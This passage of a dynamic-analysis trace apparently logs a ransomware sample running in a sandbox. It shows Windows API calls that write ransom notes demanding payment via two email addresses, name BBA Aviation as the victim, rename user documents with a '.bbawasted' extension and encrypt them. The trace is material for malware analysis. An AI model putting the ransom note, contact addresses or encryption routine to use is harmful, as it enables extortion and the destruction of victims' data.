lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0211.763] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x14fd9 [0211.763] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14fd9) returned 0x5f0000 [0211.763] CloseHandle (hObject=0x280) returned 1 [0211.774] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0211.775] CloseHandle (hObject=0x27c) returned 1 [0211.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0211.775] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0211.776] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0211.776] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0211.776] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a69b0) returned 1 [0211.777] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0211.777] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0211.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0211.960] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0211.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0211.960] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HihA3giLpYQYMbqmJFeoaXK8APtD+dW+EEXVDSjS2OgZK20NO4up+Y0t6KsqudGu\r\nLzuWpm5ChbyzQbgnfQNJakviyeeZD/z3RQSmVC8Q2q3XV63W/2dRHS30RpWRYdRT\r\nBAyIDORASQpoFSeNjQw1DFfcdC0I+0jfalWmorNh74z6fjvaTnrE4p2byiKN0pZ2\r\np1kwfKB9+2FbbB9S/phc6J/99VhAP5IutDPs/I2fVOm63sSKJdIXwgyjZYhz0HiG\r\nKC2FQX/vD3aaFu0KPwnFNtDsUPADWMhq/zjf1UbmQSi+5cr3wGQj19N25tkK0jqB\r\nk4Q8xROKyAFLU3FwJAuIKFcxAbCup+s/V+jPyW1rR7sJ7hAyjFnQ6lRLfVivnNua\r\nrPa3lZNWlank7n98C+eU9YJDoMkNX61jdt5NExav701qLzPw4sdM5lxYOOnIXMuf\r\nif0JB7xA7a+JLziGB5h7Wn2SQuzwpmMVng2fu1mT7ecUUKBKEdsMXv1nCWqaUv9Q\r\nW/QxzEVnaKvyYfmOVIQa3QJwiynRsVaO31NAmQ/StDh5jCGK3g9Luiihzq2HzM/j\r\nvbsC/M3nMyDfDufZcjw+0JIiJhkyfxq5ayvE8rITdLViJ//iyQ1MZvdlSU1DITiN\r\nJBC/cXmt8UiHdC9njOzuuXjJAnpT1khTEOFp6BHoGqf=[end_key]\r\nKEEP IT\r\n") returned 984 [0211.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0211.961] WriteFile (in: hFile=0x294, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0211.961] SetEndOfFile (hFile=0x294) returned 1 [0211.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0211.964] CloseHandle (hObject=0x294) returned 1 [0211.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a21e0 | out: hHeap=0x660000) returned 1 [0211.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b2830 | out: hHeap=0x660000) returned 1 [0211.968] _aulldvrm () returned 0x0 [0211.968] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0211.969] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0211.969] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0211.969] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4 cPG5zOtDV.docx") returned 46 [0211.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6c4b88 [0211.970] lstrcpyW (in: lpString1=0x6c4be4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0211.970] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0211.970] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0211.970] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0211.970] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0211.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4 cPG5zOtDV.docx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\4 cpg5zotdv.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0211.971] WriteFile (in: hFile=0x294, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0211.973] SetEndOfFile (hFile=0x294) returned 1 [0211.973] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0211.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0211.973] lstrcpyW (in: lpString1=0x6c4be4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0211.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4 cPG5zOtDV.docx" (normalized: "c:\\users\\fd1hvy\\documents\\4 cpg5zotdv.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4 cPG5zOtDV.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\4 cpg5zotdv.docx.bbawasted")) returned 1 [0211.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4 cPG5zOtDV.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\4 cpg5zotdv.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0211.974] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0211.975] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x89f9 [0211.975] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x89f9) returned 0x5f0000 [0211.975] CloseHandle (hObject=0x27c) returned 1 [0211.981] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0211.982] CloseHandle (hObject=0x28c) returned 1 [0211.982] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0211.982] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6708) returned 1 [0211.982] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0211.982] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0211.983] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0211.983] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0211.983] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0211.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0211.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0211.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0211.996] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gnulphKtz9J1dObKYctu3F57IMLvtojKi/hnAkzA0sHThoZPkDQ2+opLN0gIUfYZ\r\nG53uDbRcU7ghqFLJMHVZDsr8jpoEH1sV743+QMUKOaWF91KB5KErBwIJuKbsjZcQ\r\n1HkgmWuUkZmwbGuVie3fMASif7iAdao7GR9q1yoYOAyQxM4MzpXiPaubrenVskbJ\r\nEHVIlNVOkV6YnJnjksN6ZMOhbLrj6ICvrmC40w5yD+u/4bpqy06QmesJJhJxC/UI\r\nfarnVv+/iNA8tlBLtVjz1LfAx0ZF5wtARcGYTO7OvoCDFA9bP696MUS3NvKgTM8T\r\nXHN+4G1IQRUPBtjfOL0KXePr5v5rAADUK3cvLgPb9wYaECrx5AzIADBanbzFpMWx\r\nNfMiAcO6YcFP7Ux1/aod8x5kfN9ndLhFaoPjzyph9JWGquQyqaADkSZAvzBtFcRU\r\nrPLVGVlFdn1GRU8fFQQbNISFGSctSVCJdjvnX/QbE8wDnvpg3Y+nhs5W40d6iMqt\r\ndxsGDgMMeoT9GN8UiqG6avQltbqnJZTU2zxaLwa20z0KiRJYGJXSzYFTNf+aQU6d\r\nXTo/TJpd8G2e0iTsjUwieEFro8hb4zQSzj0+InW81OQ1LdnzNTep4eRGlifwr1JH\r\nTfsX59n96Eaqut3hGqTrYgKHv3PMF8HmUwJ5J96YFQa=[end_key]\r\nKEEP IT\r\n") returned 984 [0211.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0211.996] WriteFile (in: hFile=0x294, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0212.404] SetEndOfFile (hFile=0x294) returned 1 [0212.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0212.407] CloseHandle (hObject=0x294) returned 1 [0212.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0212.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6afc60 | out: hHeap=0x660000) returned 1 [0212.412] _aulldvrm () returned 0x0 [0212.413] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6bd0) returned 1 [0212.413] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0212.413] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0212.413] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4fN5SD.pdf") returned 40 [0212.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6adb18 [0212.414] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0212.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.414] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6708) returned 1 [0212.414] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0212.414] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0212.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4fN5SD.pdf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\4fn5sd.pdf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0212.415] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0212.417] SetEndOfFile (hFile=0x294) returned 1 [0212.417] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0212.417] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0212.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4fN5SD.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\4fn5sd.pdf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4fN5SD.pdf.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\4fn5sd.pdf.bbawasted")) returned 1 [0212.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4fN5SD.pdf.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\4fn5sd.pdf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0212.419] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0212.420] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x14c85 [0212.420] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14c85) returned 0x610000 [0212.420] CloseHandle (hObject=0x280) returned 1 [0212.429] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0212.429] CloseHandle (hObject=0x288) returned 1 [0212.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0212.429] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a63d8) returned 1 [0212.430] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0212.430] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0212.430] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0212.431] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0212.431] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0212.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0212.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0212.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.440] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BaBQm0GYaikf4cATVvItRfDV3woU0Rlt08MWLK5xS9Vzsn+6cINJ6xsVfhDqQK1i\r\nP9WSfnr5qvO34z/uN/y6+VicioImrcPfmE+0xSZpvzy7E91YiDdBiwPtXAzX0JXy\r\nm0zMvITdkKL+0kZRuhyUf03WzxXU4KD4+P5X4JCR93hhsh6W7vzSnmd2T85iwcrU\r\nta/DveqzQyb01uEqNynQfFPm3i3164dTfVlShiUnHVv46S8QGpGzqYgpXi/gFrDV\r\now9I6faRWVCgFIyGW9YskJRGT2WQLsF8y72FMlCAxhkt2Flt5a0dAA4MVEqFvb8c\r\nTbk0ewb0oo5wKnHCHYIaNYLDyRo7yjBkyL7ECBQqWEjSEIG8sjo5h+BnSyWoFwwj\r\no5vQd6mFt1DwmfLDcfdu0OM/UeEkLELbo+W87Tx/1RXI8sZzUu+b/Yw2HkNFsbi9\r\nwFnbl7pApZHag3jt4GCkr0JoxT6VSapPOEDImgd0fVHPGATEp03M5PrqTrahE2Rt\r\nSA9APZN7Zema4wNHs8iFn4M7XzQuDE5nO8cjdYhPeh0dFwScNduBitUrMKdWlUb9\r\nKl+0YG/RT2H/ubwtZ5KNlp5xpXVJkCqIe4k2S91o9SB8JUQtL22wOs2Xok16xZHt\r\nVBJnKlbfVi5AIXIlo6tQNHzJwMEb8gY7E7hmWC5OrkJ=[end_key]\r\nKEEP IT\r\n") returned 984 [0212.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0212.440] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0212.440] SetEndOfFile (hFile=0x294) returned 1 [0212.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0212.443] CloseHandle (hObject=0x294) returned 1 [0212.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0212.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4618 | out: hHeap=0x660000) returned 1 [0212.448] _aulldvrm () returned 0x0 [0212.448] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0212.449] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0212.449] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0212.449] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\51mXRb3inE1OoIv4siQ.docx") returned 54 [0212.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6c4b88 [0212.701] lstrcpyW (in: lpString1=0x6c4bf4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0212.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.701] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0212.702] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0212.702] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0212.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\51mXRb3inE1OoIv4siQ.docx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\51mxrb3ine1ooiv4siq.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0212.769] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0212.770] SetEndOfFile (hFile=0x27c) returned 1 [0212.770] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.770] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0212.771] lstrcpyW (in: lpString1=0x6c4bf4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0212.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\51mXRb3inE1OoIv4siQ.docx" (normalized: "c:\\users\\fd1hvy\\documents\\51mxrb3ine1ooiv4siq.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\51mXRb3inE1OoIv4siQ.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\51mxrb3ine1ooiv4siq.docx.bbawasted")) returned 1 [0212.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\51mXRb3inE1OoIv4siQ.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\51mxrb3ine1ooiv4siq.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0212.772] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0212.773] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x184e5 [0212.773] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x184e5) returned 0x5f0000 [0212.773] CloseHandle (hObject=0x28c) returned 1 [0212.783] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0212.783] CloseHandle (hObject=0x294) returned 1 [0212.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0212.784] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0212.784] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0212.784] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0212.784] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0212.785] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0212.785] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0212.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0212.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0212.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.796] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 